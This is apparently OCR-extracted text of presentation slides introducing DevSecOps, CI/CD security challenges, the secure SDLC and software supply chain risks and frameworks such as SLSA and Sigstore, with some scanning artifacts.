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Who Am I 


* Having Experience in Application Security, Source Code Review, 
Mobile Security, Risk Assessment 

e Completed Various Certifications like CISM., MCNA., Solution 
Architect(AWS)., ISO 27001(Lead Auditor)., CEH 

* Active Speaker in NULL Chennai, OWASP Chennai 


* Project Advisor for many Colleges 
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Introduction to DevSecOps 


. DevSecOps integrates security into DevOps to ensure security is part of every stage in the 
software development lifecycle. 

. Shift-left security approach brings security practices earlier in the development process, reducing 
vulnerabilities before they reach production. 

. Automation of security testing enables continuous monitoring and enforcement of security 
without slowing down CT/CD pipelines. 

. Collaboration between development, security, and operations teams ensures that security is a 
shared responsibility across all stakeholders. 

. Fosters a culture of security by embedding security practices in the workflow, reducing the risks 


of vulnerabilities and breaches. 
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Agile Development 


Continuous Integration 


Continuous Delivery 


DevOps 
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DevOps Integration 
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Key Security Challenges in CI/CD 


Vulnerabilities in third-party dependencies can introduce security risks in the software. 
Misconfigured infrastructure as code (IaC) leads to weak security in cloud and on-prem environments. 
Insufficient automated security testing causes vulnerabilities to go undetected during development. 
Insecure secrets management can expose sensitive credentials like API keys and passwords. 
Unvalidated open-source components may contain hidden or known vulnerabilities. 

Inadequate access controls in CI/CD tools can lead to unauthorized code changes. 

Inconsistent patch management delays fixes for known vulnerabilities in deployed environments. 


Lack of real-time security monitoring leads to delayed detection of security incidents. 
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Weak container security leaves containerized applications exposed to threats. 
10. No governance over CI/CD pipeline configurations results in non-compliant workflows and risky 


deployments. 


Automation Tools for Securing CI/CD 
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. SAST/DAST Tools: SonarQube, Veracode, etc. 
. Container Security: Docker, Aqua Security. ( j Q C) U Q 
. IaC Security: Terraform, AWS Config. 


. Secrets Management: HashiCorp Vault, AWS Secrets Manager HashiCorp 


Ke Terraform 
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. CI/CD Pipeline Tools: Jenkins, GitLab CI, CircleCI. 
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SDLC and SSDLC 


e SDLC (Software Development Lifecycle) 
* Structured process to develop and maintain high-quality software 
products. 
* Key phases: 
* Requirements 


* Design 
* Development 
* Testing 


* Deployment 
* Maintenance 


* SSDLC (Secure Software Development Lifecycle) 
* |ncorporate security requirements into dev scope. 
* Secure Design Review and Threat modeling. 


Secur ity Testing & 

。 Secure coding Practices (SAST, laC, CI/CD Security and SCA). Code Revie 
。 Security Testing (RASP and DAST). 

* Continuous Monitoring and Assessments. 


Introduction to software supply chain 


Encompasses all the code, components, libraries, 
dependencies, tools, processes, and people involved in 
developing, building, and publishing a software artifact. 


SCA vs Supply chain security: 
。 SCA covers only the dependencies involved in the code 
whereas, 


* The software supply chain security involves securing 
CI/CD pipelines, build artifacts, your IDE, version control 
and everything else involved in making the software. 


Automotive Supply chain vs Software Supply Chain: 


* Major in-house produced components like engines and 
transmissions ( In-house code) 

* Third-party components like door handles, brake lights, 
and wiper blades (third-party dependencies) 

* The manufacturing facilities, machinery, and tooling 
used to assemble the car (CI/CD pipelines) 

* The workers working in the production facility (People 
involved) 
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build systems/ network application deployed 
engineers repository systems 


Understanding software supply chain 
vulnerabilities 


* Weaknesses or flaws that exists within the processes or tools involved in developing, integrating and delivering 
software can be exploited by attackers. 


* Vulnerabilities can lead to a breach which leads to distribution of compromised software to downstream 
customers. 


e Vulnerabilities can emerge at any stage of the SDLC, and reliance on external vendors and contractors 
heightens the risk of attacks. 
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Real World attack scenarios 


Developers 
wider threat 


* Hardcoded secrets. 
e Insecure proprietary code. 
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e Compromised source control systems. I m 
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* Code tampering, including the insertion of 
malicious code. 
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* Insider threats. 


Build Automation 
Miscosfigured systems 


e Compromised CI/CD pipelines. 


* Commercial third-party software or open- 
source software vulnerabilities. 


e Undermined code signing. 
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* laC misconfigurations. 


* Vulnerabilities or misconfigurations in 
running software. 


* Controlled shift-left and shift-right 
strategies. 


。 Using software supply chain frameworks 
and tools Such as: 
。 NIST, 
: * MITRE ATT&CK, 
Best Practices Geen 

。 SLSA, 

e Sigstore, 

* S2C2F etc., to secure the builds. 


* Building a strong security culture within 
the organization. 
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Vulnerability scanning 
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